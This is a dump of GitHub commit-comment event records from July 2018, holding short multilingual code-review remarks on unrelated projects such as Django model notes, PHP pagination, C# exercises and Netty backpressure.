{"id":"7911632883","type":"CommitCommentEvent","actor":{"login":"kotik"},"repo":{"name":"orsinium/notes"},"payload":{"comment":{"id":29578465,"position":8,"line":8,"path":"notes-ru/db-models.md","commit_id":"104397ccd93e347a4f0bbd4bc60e94e57b533f11","created_at":"2018-07-03T10:21:25Z","updated_at":"2018-07-03T10:21:25Z","author_association":"NONE","body":"Забавно когда разработчик слепо следует этому правилу и пишет `is_exists` :)"}},"created_at":"2018-07-03T10:21:25Z"}
{"id":"7911633368","type":"CommitCommentEvent","actor":{"login":"ForserX"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29578466,"position":null,"line":null,"path":null,"commit_id":"cf84c7300e0ea5114c765f34869b44e525375fa6","created_at":"2018-07-03T10:21:30Z","updated_at":"2018-07-03T10:21:30Z","author_association":"CONTRIBUTOR","body":"Когда в окси переносил, заметил, что ты на всех ридерах консты порезал. Ай-ай-ай, так делать нельзя. У меня в ЗП из-за этого куча ошибок повылазила. В ТЧ код более олдскульный был, поэтому там прокатило. "}},"created_at":"2018-07-03T10:21:30Z"}
{"id":"7911636049","type":"CommitCommentEvent","actor":{"login":"dima-chebotar"},"repo":{"name":"dima-chebotar/gallery"},"payload":{"comment":{"id":29578474,"position":40,"line":40,"path":"app/Pagination.php","commit_id":"c95e3428c24ed30d6c1cb4fd63b5d15a2326fa90","created_at":"2018-07-03T10:22:02Z","updated_at":"2018-07-03T10:22:02Z","author_association":"OWNER","body":"2. Тут приймаємо номер сторінки та формуємо новий масив даних (в залежності від номеру сторінки) та через exit() повертаємо новий масив в js. Також завершуємо роботу скрипта, далі його виконання не потрібно + якщо не завершити роботу в js повернеться весь документ, що не дуже добре."}},"created_at":"2018-07-03T10:22:02Z"}
{"id":"7911640633","type":"CommitCommentEvent","actor":{"login":"akimlyubchenko"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29578480,"position":5,"line":25,"path":"NET.S.2018.Lyubchenko.01/ArraySorts/ArraySorts.cs","commit_id":"789124b094ea21df715456f26f9f8e1281fb7479","created_at":"2018-07-03T10:22:57Z","updated_at":"2018-07-03T10:22:57Z","author_association":"OWNER","body":"Выполнено"}},"created_at":"2018-07-03T10:22:57Z"}
{"id":"7911641582","type":"CommitCommentEvent","actor":{"login":"akimlyubchenko"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29578482,"position":11,"line":27,"path":"NET.S.2018.Lyubchenko.01/ArraySorts/ArraySorts.cs","commit_id":"789124b094ea21df715456f26f9f8e1281fb7479","created_at":"2018-07-03T10:23:10Z","updated_at":"2018-07-03T10:23:10Z","author_association":"OWNER","body":"Выполнено"}},"created_at":"2018-07-03T10:23:10Z"}
{"id":"7911642448","type":"CommitCommentEvent","actor":{"login":"akimlyubchenko"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29578483,"position":51,"line":76,"path":"NET.S.2018.Lyubchenko.01/ArraySorts/ArraySorts.cs","commit_id":"789124b094ea21df715456f26f9f8e1281fb7479","created_at":"2018-07-03T10:23:20Z","updated_at":"2018-07-03T10:23:20Z","author_association":"OWNER","body":"Выполнено"}},"created_at":"2018-07-03T10:23:20Z"}
{"id":"7911643894","type":"CommitCommentEvent","actor":{"login":"akimlyubchenko"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29578487,"position":51,"line":76,"path":"NET.S.2018.Lyubchenko.01/ArraySorts/ArraySorts.cs","commit_id":"789124b094ea21df715456f26f9f8e1281fb7479","created_at":"2018-07-03T10:23:40Z","updated_at":"2018-07-03T10:23:40Z","author_association":"OWNER","body":"Выполнено"}},"created_at":"2018-07-03T10:23:40Z"}
{"id":"7911643948","type":"CommitCommentEvent","actor":{"login":"akimlyubchenko"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29578488,"position":51,"line":76,"path":"NET.S.2018.Lyubchenko.01/ArraySorts/ArraySorts.cs","commit_id":"789124b094ea21df715456f26f9f8e1281fb7479","created_at":"2018-07-03T10:23:41Z","updated_at":"2018-07-03T10:23:41Z","author_association":"OWNER","body":"Выполнено"}},"created_at":"2018-07-03T10:23:41Z"}
{"id":"7911644585","type":"CommitCommentEvent","actor":{"login":"akimlyubchenko"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29578490,"position":128,"line":173,"path":"NET.S.2018.Lyubchenko.01/ArraySorts/ArraySorts.cs","commit_id":"789124b094ea21df715456f26f9f8e1281fb7479","created_at":"2018-07-03T10:23:49Z","updated_at":"2018-07-03T10:23:49Z","author_association":"OWNER","body":"Выполнено"}},"created_at":"2018-07-03T10:23:49Z"}
{"id":"7911644911","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29578491,"position":null,"line":null,"path":null,"commit_id":"e1826ac04d141562556eb0865c59ee076bfade9a","created_at":"2018-07-03T10:23:53Z","updated_at":"2018-07-03T10:23:53Z","author_association":"OWNER","body":"commit index"}},"created_at":"2018-07-03T10:23:53Z"}
{"id":"7911645621","type":"CommitCommentEvent","actor":{"login":"kotik"},"repo":{"name":"orsinium/notes"},"payload":{"comment":{"id":29578492,"position":12,"line":12,"path":"notes-ru/db-models.md","commit_id":"104397ccd93e347a4f0bbd4bc60e94e57b533f11","created_at":"2018-07-03T10:24:02Z","updated_at":"2018-07-03T10:24:02Z","author_association":"NONE","body":"Какое-то время назад `on_delete` было опциональным полем. В последней LTS джанге незаполненное `on_delete` генерит варнинги. C версии 2.0 это поле стало обязательным"}},"created_at":"2018-07-03T10:24:02Z"}
{"id":"7911666804","type":"CommitCommentEvent","actor":{"login":"kotik"},"repo":{"name":"orsinium/notes"},"payload":{"comment":{"id":29578545,"position":23,"line":23,"path":"notes-ru/db-models.md","commit_id":"104397ccd93e347a4f0bbd4bc60e94e57b533f11","created_at":"2018-07-03T10:28:24Z","updated_at":"2018-07-03T10:28:24Z","author_association":"NONE","body":"Можно еще упомянуть, что `.save()` дергает сигналы, а `qs.update()` нет\r\n`.save()` обновляем `updated_at`, а `qs.update()` нет "}},"created_at":"2018-07-03T10:28:24Z"}
{"id":"7911670188","type":"CommitCommentEvent","actor":{"login":"phpcourses"},"repo":{"name":"dima-chebotar/gallery"},"payload":{"comment":{"id":29578560,"position":40,"line":40,"path":"app/Pagination.php","commit_id":"c95e3428c24ed30d6c1cb4fd63b5d15a2326fa90","created_at":"2018-07-03T10:29:09Z","updated_at":"2018-07-03T10:29:09Z","author_association":"NONE","body":"то треба за допомогою умов на стороні php зробити так щоб запит не виконувало"}},"created_at":"2018-07-03T10:29:09Z"}
{"id":"7911670322","type":"CommitCommentEvent","actor":{"login":"muralivijay"},"repo":{"name":"ryan-andri/android_kernel_xiaomi_santoni"},"payload":{"comment":{"id":29578561,"position":null,"line":null,"path":null,"commit_id":"0cac393e950038e73a0da15c43b0b519d24965e8","created_at":"2018-07-03T10:29:11Z","updated_at":"2018-07-03T10:29:11Z","author_association":"NONE","body":"what use of this driver ?"}},"created_at":"2018-07-03T10:29:11Z"}
{"id":"7911670499","type":"CommitCommentEvent","actor":{"login":"PRElias"},"repo":{"name":"PRElias/win10_emulation_station"},"payload":{"comment":{"id":29578563,"position":null,"line":null,"path":null,"commit_id":"95534fa682204a63aed5d20b3b2b9aa3aa8d462e","created_at":"2018-07-03T10:29:13Z","updated_at":"2018-07-03T10:29:13Z","author_association":"OWNER","body":"I understand your point. I was thinking on make it more abstract, asking user for an input for a custom folder. But, this is optional and is very important to me as a user. If you dislike the approach, I may not submit a PR on this file"}},"created_at":"2018-07-03T10:29:13Z"}
{"id":"7911676679","type":"CommitCommentEvent","actor":{"login":"sbellity"},"repo":{"name":"hull/hull-node"},"payload":{"comment":{"id":29578578,"position":null,"line":null,"path":null,"commit_id":"4855d0a8920bcd36bf7f67e0d626906bb1aeee04","created_at":"2018-07-03T10:30:28Z","updated_at":"2018-07-03T10:30:28Z","author_association":"MEMBER","body":"@michaloo isn't this breaking ?"}},"created_at":"2018-07-03T10:30:28Z"}
{"id":"7911676705","type":"CommitCommentEvent","actor":{"login":"JefferShell"},"repo":{"name":"JefferShell/token-profile"},"payload":{"comment":{"id":29578579,"position":null,"line":null,"path":null,"commit_id":"b64e298f267a046e1515117cf76c0b89c4457cdf","created_at":"2018-07-03T10:30:28Z","updated_at":"2018-07-03T10:30:28Z","author_association":"OWNER","body":"新增详细信息"}},"created_at":"2018-07-03T10:30:28Z"}
{"id":"7911679654","type":"CommitCommentEvent","actor":{"login":"phpcourses"},"repo":{"name":"dima-chebotar/gallery"},"payload":{"comment":{"id":29578584,"position":65,"line":65,"path":"public/js/main.js","commit_id":"c95e3428c24ed30d6c1cb4fd63b5d15a2326fa90","created_at":"2018-07-03T10:31:04Z","updated_at":"2018-07-03T10:31:04Z","author_association":"NONE","body":"1. пагінації не було в задачі, тому якщо узявся розрулуй сам :)\r\n2. краще так  {“content”: “<ul><li…/li></ul>“}\r\nі підміна html $(‘.container’).html(data.content); в тестовй задачі акцент на PHP все ж"}},"created_at":"2018-07-03T10:31:04Z"}
{"id":"7911681675","type":"CommitCommentEvent","actor":{"login":"kotik"},"repo":{"name":"orsinium/notes"},"payload":{"comment":{"id":29578587,"position":18,"line":18,"path":"notes-ru/db-models.md","commit_id":"104397ccd93e347a4f0bbd4bc60e94e57b533f11","created_at":"2018-07-03T10:31:28Z","updated_at":"2018-07-03T10:31:28Z","author_association":"NONE","body":"Еще можно добавить про индексы, составные индексы, лидирующие колонки в составных индексах и что unique / unique_together работает как индекс\r\n\r\nМожно еще сказать что для сторок создается 2 типа индексов. И один из них очень пухлый на больших таблицах и его имеет смысл удалять если не используется `LIKE %pattern`"}},"created_at":"2018-07-03T10:31:28Z"}
{"id":"7911681974","type":"CommitCommentEvent","actor":{"login":"max99x"},"repo":{"name":"stonehearth/stonehearth-editor"},"payload":{"comment":{"id":29578588,"position":4,"line":3,"path":"StonehearthEditor/schemas/encounters/elements/bulletin.json","commit_id":"8cee968da3899cc32eb6daa41bfbb6c003a5bcdb","created_at":"2018-07-03T10:31:32Z","updated_at":"2018-07-03T10:31:32Z","author_association":"COLLABORATOR","body":"@lukerinard FYI the IDs here and in `loot_table.json` are changed probably unintentionally."}},"created_at":"2018-07-03T10:31:32Z"}
{"id":"7911688514","type":"CommitCommentEvent","actor":{"login":"lamby"},"repo":{"name":"saschamarkus/whisperback"},"payload":{"comment":{"id":29578598,"position":19,"line":161,"path":"whisperBack/whisperback.py","commit_id":"6c16e41e25ce1aba051b00557434050a26318d63","created_at":"2018-07-03T10:32:52Z","updated_at":"2018-07-03T10:32:52Z","author_association":"NONE","body":"Right, hence \"style\" treatment... not a literal copy-paste.\r\n\r\n`filter` with `lambda` is not very Pythonic in 2018 - you really want a list comprehension."}},"created_at":"2018-07-03T10:32:52Z"}
{"id":"7911691243","type":"CommitCommentEvent","actor":{"login":"Feddy93"},"repo":{"name":"udacity/ud843-QuakeReport"},"payload":{"comment":{"id":29578602,"position":46,"line":117,"path":"app/src/main/java/com/example/android/quakereport/EarthquakeActivity.java","commit_id":"f0f9cd5ee7a8d67bd2e6f7e2539664a95499831b","created_at":"2018-07-03T10:33:28Z","updated_at":"2018-07-03T10:33:28Z","author_association":"NONE","body":"mEmptyTextView = findViewById(R.id.empty_view);\r\nAdd that line to avoid a NullPointerException here"}},"created_at":"2018-07-03T10:33:28Z"}
{"id":"7911692856","type":"CommitCommentEvent","actor":{"login":"PRElias"},"repo":{"name":"PRElias/win10_emulation_station"},"payload":{"comment":{"id":29578607,"position":null,"line":null,"path":null,"commit_id":"8157134cf7683c68a4b9afd4897415fe1e004689","created_at":"2018-07-03T10:33:49Z","updated_at":"2018-07-03T10:33:49Z","author_association":"OWNER","body":"Thanks, I had the ideia managing the solution on vscode"}},"created_at":"2018-07-03T10:33:49Z"}
{"id":"7911693046","type":"CommitCommentEvent","actor":{"login":"beastdestroyer"},"repo":{"name":"Binaryify/OneDark-Pro"},"payload":{"comment":{"id":29578608,"position":null,"line":null,"path":null,"commit_id":"5a4c67b1172c2afda7e8c91330a569ba617bb7eb","created_at":"2018-07-03T10:33:51Z","updated_at":"2018-07-03T10:33:51Z","author_association":"CONTRIBUTOR","body":"Apologies, I seem to have made a mistake, removing that line does make it better without bugging YAML, seems I must have read the tmScopes wrong lol, Definitely get @Binaryify in here"}},"created_at":"2018-07-03T10:33:51Z"}
{"id":"7911693116","type":"CommitCommentEvent","actor":{"login":"Feddy93"},"repo":{"name":"udacity/ud843-QuakeReport"},"payload":{"comment":{"id":29578609,"position":46,"line":117,"path":"app/src/main/java/com/example/android/quakereport/EarthquakeActivity.java","commit_id":"f0f9cd5ee7a8d67bd2e6f7e2539664a95499831b","created_at":"2018-07-03T10:33:52Z","updated_at":"2018-07-03T10:33:52Z","author_association":"NONE","body":"mEmptyTextView = findViewById(R.id.empty_view);\r\nAdd that line to avoid a NullPointerException here"}},"created_at":"2018-07-03T10:33:52Z"}
{"id":"7911694078","type":"CommitCommentEvent","actor":{"login":"Feddy93"},"repo":{"name":"udacity/ud843-QuakeReport"},"payload":{"comment":{"id":29578614,"position":45,"line":116,"path":"app/src/main/java/com/example/android/quakereport/EarthquakeActivity.java","commit_id":"f0f9cd5ee7a8d67bd2e6f7e2539664a95499831b","created_at":"2018-07-03T10:34:05Z","updated_at":"2018-07-03T10:34:05Z","author_association":"NONE","body":"mEmptyTextView = findViewById(R.id.empty_view);\r\nAdd that line to avoid a NullPointerException here"}},"created_at":"2018-07-03T10:34:05Z"}
{"id":"7911694796","type":"CommitCommentEvent","actor":{"login":"caspervdw"},"repo":{"name":"nens/cookiecutter-djangosite-template"},"payload":{"comment":{"id":29578618,"position":null,"line":null,"path":null,"commit_id":"69381380a6e29b6b35a6caca32e6ed5637266a30","created_at":"2018-07-03T10:34:14Z","updated_at":"2018-07-03T10:34:14Z","author_association":"CONTRIBUTOR","body":"Absolutely! With this I meant: do not ship the pipfile _with the cookiecutter template_ . It didn't work, because of a bug in pipenv, which is fixed now. So I readded it."}},"created_at":"2018-07-03T10:34:14Z"}
{"id":"7911695155","type":"CommitCommentEvent","actor":{"login":"interma"},"repo":{"name":"Pivotal-DataFabric/hawq-misc"},"payload":{"comment":{"id":29578619,"position":8,"line":364,"path":"pkg/hawq/hawq_spec.go","commit_id":"8f6c06defa7fd0b80958c91c6793d5d43250ce92","created_at":"2018-07-03T10:34:19Z","updated_at":"2018-07-03T10:34:19Z","author_association":"MEMBER","body":"Now cannot running on minikube.\r\n\r\nTODO: \r\nRun on GKE is a optional, e.g. provide a env variable to declare we are using GKE.\r\n"}},"created_at":"2018-07-03T10:34:19Z"}
{"id":"7911696752","type":"CommitCommentEvent","actor":{"login":"ryan-andri"},"repo":{"name":"ryan-andri/android_kernel_xiaomi_santoni"},"payload":{"comment":{"id":29578621,"position":null,"line":null,"path":null,"commit_id":"0cac393e950038e73a0da15c43b0b519d24965e8","created_at":"2018-07-03T10:34:40Z","updated_at":"2018-07-03T10:34:40Z","author_association":"OWNER","body":"@muralivijay you can read any information from this: https://forum.xda-developers.com/android/development/guide-how-to-port-dts-eagle-to-t3802259"}},"created_at":"2018-07-03T10:34:40Z"}
{"id":"7911699066","type":"CommitCommentEvent","actor":{"login":"uzanka"},"repo":{"name":"sakura-editor/sakura"},"payload":{"comment":{"id":29578624,"position":4,"line":25,"path":"sakura_core/_main/CControlProcess.cpp","commit_id":"9515cb9c4218a33ada395b2517e5c737d033ccd6","created_at":"2018-07-03T10:35:11Z","updated_at":"2018-07-03T10:35:11Z","author_association":"NONE","body":"スラッシュでは。"}},"created_at":"2018-07-03T10:35:11Z"}
{"id":"7911701571","type":"CommitCommentEvent","actor":{"login":"ChanakyaNani"},"repo":{"name":"ChanakyaNani/helloWorld"},"payload":{"comment":{"id":29578630,"position":null,"line":null,"path":null,"commit_id":"e3d501e94c1f332bd96b5662cefe2cb3335f0b3d","created_at":"2018-07-03T10:35:43Z","updated_at":"2018-07-03T10:35:43Z","author_association":"OWNER","body":"you could've added more description and written much better"}},"created_at":"2018-07-03T10:35:43Z"}
{"id":"7911701589","type":"CommitCommentEvent","actor":{"login":"PRElias"},"repo":{"name":"PRElias/win10_emulation_station"},"payload":{"comment":{"id":29578631,"position":null,"line":null,"path":null,"commit_id":"5f1a6ed2d43da585b6d854ab0de0503d08a8a71e","created_at":"2018-07-03T10:35:43Z","updated_at":"2018-07-03T10:35:43Z","author_association":"OWNER","body":"Sorry. Done!"}},"created_at":"2018-07-03T10:35:43Z"}
{"id":"7911702975","type":"CommitCommentEvent","actor":{"login":"TheWickerMan"},"repo":{"name":"TheWickerMan/MiniatureHackerToolkit"},"payload":{"comment":{"id":29578636,"position":null,"line":null,"path":null,"commit_id":"c1e7f6f92824796a555776ebb6a4e81c041ced63","created_at":"2018-07-03T10:35:59Z","updated_at":"2018-07-03T10:35:59Z","author_association":"OWNER","body":"https://www.troyhunt.com/the-have-i-been-pwned-api-rate-limiting-and-commercial-use/"}},"created_at":"2018-07-03T10:35:59Z"}
{"id":"7911711607","type":"CommitCommentEvent","actor":{"login":"skeptic35"},"repo":{"name":"ractivejs/ractive"},"payload":{"comment":{"id":29578647,"position":null,"line":null,"path":null,"commit_id":"1cb3bec08229509c44ff7adf8250d2d8f444ddee","created_at":"2018-07-03T10:37:44Z","updated_at":"2018-07-03T10:37:44Z","author_association":"NONE","body":"This change broke the possibility to reattach an event listener using the same callback. Once the listener was removed, the `callback` has its `off` property set to `true` and therefor won't fire again, unless I manually set that property to `false` or entirely delete it before reattaching.\r\nStumbled accross that problem in 0.8.11. But as far as I can see in the code, the problem still exists."}},"created_at":"2018-07-03T10:37:44Z"}
{"id":"7911715419","type":"CommitCommentEvent","actor":{"login":"abcsds"},"repo":{"name":"gpsvieira/TextRank"},"payload":{"comment":{"id":29578654,"position":null,"line":null,"path":null,"commit_id":"2900c0fb488e2546a6b3af275bb03e52e168e5e2","created_at":"2018-07-03T10:38:28Z","updated_at":"2018-07-03T10:38:28Z","author_association":"NONE","body":"Example on sentence construction"}},"created_at":"2018-07-03T10:38:28Z"}
{"id":"7911715508","type":"CommitCommentEvent","actor":{"login":"PRElias"},"repo":{"name":"PRElias/win10_emulation_station"},"payload":{"comment":{"id":29578655,"position":2,"line":2,"path":"prepare.ps1","commit_id":"5f1a6ed2d43da585b6d854ab0de0503d08a8a71e","created_at":"2018-07-03T10:38:30Z","updated_at":"2018-07-03T10:38:30Z","author_association":"OWNER","body":"I am not an expert on that as you, then I want to do some more tests. If you accpet this one, \"feel free\" to make any modifications\r\n\r\nAbout the malicious script, I think it could be anywhere on this whole approach, don't you agree?"}},"created_at":"2018-07-03T10:38:30Z"}
{"id":"7911715635","type":"CommitCommentEvent","actor":{"login":"franz1981"},"repo":{"name":"apache/qpid-jms"},"payload":{"comment":{"id":29578656,"position":13,"line":136,"path":"qpid-jms-client/src/main/java/org/apache/qpid/jms/provider/amqp/AmqpProvider.java","commit_id":"7750a1c27589261b197d7b746506e19d8771b145","created_at":"2018-07-03T10:38:32Z","updated_at":"2018-07-03T10:38:32Z","author_association":"NONE","body":"Netty allows to query efficiently the backpressure of the I/O network layer using:\r\n\r\n- Channel:isWritable (Channel::bytesBeforeUnwritable/Channel::bytesBeforeWritable too)\r\n- managing [channelWritabilityChanged](https://netty.io/4.0/api/io/netty/channel/ChannelInboundHandler.html#channelWritabilityChanged-io.netty.channel.ChannelHandlerContext-) events, but it works if you are in EventLoop\r\n\r\nChannel::isWritable is dependent by the Netty configuration of ChannelOption.WRITE_BUFFER_HIGH_WATER_MARK and ChannelOption.WRITE_BUFFER_LOW_WATER_MARK and are directly related to the backpressure provided by the socket writer ie it is directly related to TCP backpressure and the capacity of the other peer (eg the broker) to read enough data to let the socket buffer able to receive the data on the netty write buffer."}},"created_at":"2018-07-03T10:38:32Z"}
{"id":"7911716083","type":"CommitCommentEvent","actor":{"login":"savevjr"},"repo":{"name":"powerslider/test_repo"},"payload":{"comment":{"id":29578657,"position":1,"line":1,"path":"alabala1.txt","commit_id":"8abec68f56506ec55b80d79903a349d1a9459c44","created_at":"2018-07-03T10:38:38Z","updated_at":"2018-07-03T10:38:38Z","author_association":"NONE","body":"🕺 "}},"created_at":"2018-07-03T10:38:38Z"}
{"id":"7911716221","type":"CommitCommentEvent","actor":{"login":"tigrh"},"repo":{"name":"SyncedPSI/Synced"},"payload":{"comment":{"id":29578658,"position":5,"line":31,"path":"app/views/special_columns/setting.html.slim","commit_id":"1027cdd32d457025aeff9d753bb4d699c476c1d5","created_at":"2018-07-03T10:38:40Z","updated_at":"2018-07-03T10:38:40Z","author_association":"NONE","body":"Mani"}},"created_at":"2018-07-03T10:38:40Z"}
{"id":"7911717623","type":"CommitCommentEvent","actor":{"login":"mayanje"},"repo":{"name":"TypeCobolTeam/TypeCobol"},"payload":{"comment":{"id":29578663,"position":null,"line":null,"path":null,"commit_id":"04c17c8de501d53e1f369b8f7df075415416bdf8","created_at":"2018-07-03T10:38:59Z","updated_at":"2018-07-03T10:38:59Z","author_association":"CONTRIBUTOR","body":"Test for this issue is tagged [Ignore] because for testing this issue, one shall create a C:\\TypeCobol\\Copys directory and put in this directory the copy file: MSVCOUT.cpy"}},"created_at":"2018-07-03T10:38:59Z"}
{"id":"7911718371","type":"CommitCommentEvent","actor":{"login":"acouriol"},"repo":{"name":"shoprunback/documentation"},"payload":{"comment":{"id":29578665,"position":3,"line":3,"path":"source/index.html.erb","commit_id":"a1e673e5992c7c30764cbae30e4edc037bcf021d","created_at":"2018-07-03T10:39:09Z","updated_at":"2018-07-03T10:39:09Z","author_association":"NONE","body":"<meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no\" />\r\n    <meta name=\"apple-mobile-web-app-capable\" content=\"yes\" />\r\n\t<meta name=\"MobileOptimized\" content=\"width\" />\r\n    <meta name=\"HandheldFriendly\" content=\"true\" /> ?\r\n"}},"created_at":"2018-07-03T10:39:09Z"}
{"id":"7911719302","type":"CommitCommentEvent","actor":{"login":"PRElias"},"repo":{"name":"PRElias/win10_emulation_station"},"payload":{"comment":{"id":29578668,"position":11,"line":11,"path":"prepare.ps1","commit_id":"5f1a6ed2d43da585b6d854ab0de0503d08a8a71e","created_at":"2018-07-03T10:39:21Z","updated_at":"2018-07-03T10:39:21Z","author_association":"OWNER","body":"Yes, thats the idea. Do you think it's a problem to ask for a powershell update if it was necessary?"}},"created_at":"2018-07-03T10:39:21Z"}
{"id":"7911719345","type":"CommitCommentEvent","actor":{"login":"tigrh"},"repo":{"name":"SyncedPSI/Synced"},"payload":{"comment":{"id":29578669,"position":12,"line":227,"path":"frontend/sites/application/styles/_all_header.scss","commit_id":"1027cdd32d457025aeff9d753bb4d699c476c1d5","created_at":"2018-07-03T10:39:22Z","updated_at":"2018-07-03T10:39:22Z","author_association":"NONE","body":"X35"}},"created_at":"2018-07-03T10:39:22Z"}
{"id":"7911720802","type":"CommitCommentEvent","actor":{"login":"acouriol"},"repo":{"name":"shoprunback/documentation"},"payload":{"comment":{"id":29578675,"position":3,"line":3,"path":"source/index.html.erb","commit_id":"a1e673e5992c7c30764cbae30e4edc037bcf021d","created_at":"2018-07-03T10:39:40Z","updated_at":"2018-07-03T10:39:40Z","author_association":"NONE","body":"<meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no\" />\r\n    <meta name=\"apple-mobile-web-app-capable\" content=\"yes\" />\r\n\t<meta name=\"MobileOptimized\" content=\"width\" />\r\n    <meta name=\"HandheldFriendly\" content=\"true\" /> "}},"created_at":"2018-07-03T10:39:40Z"}
{"id":"7911721299","type":"CommitCommentEvent","actor":{"login":"jperedadnr"},"repo":{"name":"abhinayagarwal/MyDevoxxGluon"},"payload":{"comment":{"id":29578677,"position":6,"line":32,"path":"DevoxxClientMobile/build.gradle","commit_id":"1c9cb6d1df770d0f2acd6c4ea2e6057a3a7f16f4","created_at":"2018-07-03T10:39:46Z","updated_at":"2018-07-03T10:39:46Z","author_association":"NONE","body":"The notch works fine with 1.4.0. There is a hardcoded setting for the AppBar that overrides the ios_notch.css style."}},"created_at":"2018-07-03T10:39:46Z"}
{"id":"7911726435","type":"CommitCommentEvent","actor":{"login":"acouriol"},"repo":{"name":"shoprunback/documentation"},"payload":{"comment":{"id":29578682,"position":3,"line":3,"path":"source/index.html.erb","commit_id":"a1e673e5992c7c30764cbae30e4edc037bcf021d","created_at":"2018-07-03T10:40:51Z","updated_at":"2018-07-03T10:40:51Z","author_association":"NONE","body":"> \r\n<meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no\" />\r\n    <meta name=\"apple-mobile-web-app-capable\" content=\"yes\" />\r\n\t<meta name=\"MobileOptimized\" content=\"width\" />\r\n    <meta name=\"HandheldFriendly\" content=\"true\" />\r\n> "}},"created_at":"2018-07-03T10:40:51Z"}
{"id":"7911728343","type":"CommitCommentEvent","actor":{"login":"v0dro"},"repo":{"name":"pgtgrly/GRruby-extension"},"payload":{"comment":{"id":29578686,"position":12,"line":12,"path":"lib/rubyplot/figure.rb","commit_id":"6ab63c5e193879505c9e865230c6f024b17772fb","created_at":"2018-07-03T10:41:17Z","updated_at":"2018-07-03T10:41:17Z","author_association":"COLLABORATOR","body":"How about set this to `[nil,nil]` so its more obvious?"}},"created_at":"2018-07-03T10:41:17Z"}
{"id":"7911734347","type":"CommitCommentEvent","actor":{"login":"openhab-bot"},"repo":{"name":"openhab/org.openhab.binding.zwave"},"payload":{"comment":{"id":29578695,"position":null,"line":null,"path":null,"commit_id":"a682a47603e84d921011ef1e1bf4c7761d3a00c2","created_at":"2018-07-03T10:42:36Z","updated_at":"2018-07-03T10:42:36Z","author_association":"COLLABORATOR","body":"This commit has been mentioned on **openHAB Community**. There might be relevant details there:\n\nhttps://community.openhab.org/t/oh2-z-wave-refactoring-and-testing-and-security/21653/3091\n"}},"created_at":"2018-07-03T10:42:36Z"}
{"id":"7911735158","type":"CommitCommentEvent","actor":{"login":"aksr"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29578698,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-03T10:42:47Z","updated_at":"2018-07-03T10:42:47Z","author_association":"NONE","body":"@Alhadis: Can you describe the problem you experience with building Neatroff?"}},"created_at":"2018-07-03T10:42:47Z"}
{"id":"7911735230","type":"CommitCommentEvent","actor":{"login":"akimlyubchenko"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29578699,"position":59,"line":59,"path":"NET.S.2018.Lyubchenko.03/RootCalculator/RootCalculator.cs","commit_id":"2d2e0637469b8c8c90bfb2c69a98f424b9930cef","created_at":"2018-07-03T10:42:48Z","updated_at":"2018-07-03T10:42:48Z","author_association":"OWNER","body":"Выполнено"}},"created_at":"2018-07-03T10:42:48Z"}
{"id":"7911735582","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"dev-harsh1998/Transfer"},"payload":{"comment":{"id":29578700,"position":5,"line":92,"path":"transfer.c","commit_id":"954cdc5b9acdb08d32fa654f7cdc9b4222a3ab55","created_at":"2018-07-03T10:42:53Z","updated_at":"2018-07-03T10:42:53Z","author_association":"COLLABORATOR","body":"Bruh..."}},"created_at":"2018-07-03T10:42:53Z"}
{"id":"7911738735","type":"CommitCommentEvent","actor":{"login":"akimlyubchenko"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29578704,"position":87,"line":87,"path":"NET.S.2018.Lyubchenko.03/RootCalculator/RootCalculator.cs","commit_id":"2d2e0637469b8c8c90bfb2c69a98f424b9930cef","created_at":"2018-07-03T10:43:34Z","updated_at":"2018-07-03T10:43:34Z","author_association":"OWNER","body":"Выполнено"}},"created_at":"2018-07-03T10:43:34Z"}
{"id":"7911740281","type":"CommitCommentEvent","actor":{"login":"akimlyubchenko"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29578710,"position":40,"line":40,"path":"NET.S.2018.Lyubchenko.03/RootCalculator/RootCalculator.cs","commit_id":"2d2e0637469b8c8c90bfb2c69a98f424b9930cef","created_at":"2018-07-03T10:43:54Z","updated_at":"2018-07-03T10:43:54Z","author_association":"OWNER","body":"Выполнено"}},"created_at":"2018-07-03T10:43:54Z"}
{"id":"7911743930","type":"CommitCommentEvent","actor":{"login":"akimlyubchenko"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29578724,"position":18,"line":18,"path":"NET.S.2018.Lyubchenko.03/RootCalculator/RootCalculator.cs","commit_id":"2d2e0637469b8c8c90bfb2c69a98f424b9930cef","created_at":"2018-07-03T10:44:41Z","updated_at":"2018-07-03T10:44:41Z","author_association":"OWNER","body":"Выполнено"}},"created_at":"2018-07-03T10:44:41Z"}
{"id":"7911744543","type":"CommitCommentEvent","actor":{"login":"akimlyubchenko"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29578726,"position":20,"line":20,"path":"NET.S.2018.Lyubchenko.03/RootCalculator/RootCalculator.cs","commit_id":"2d2e0637469b8c8c90bfb2c69a98f424b9930cef","created_at":"2018-07-03T10:44:48Z","updated_at":"2018-07-03T10:44:48Z","author_association":"OWNER","body":"Выполнено"}},"created_at":"2018-07-03T10:44:48Z"}
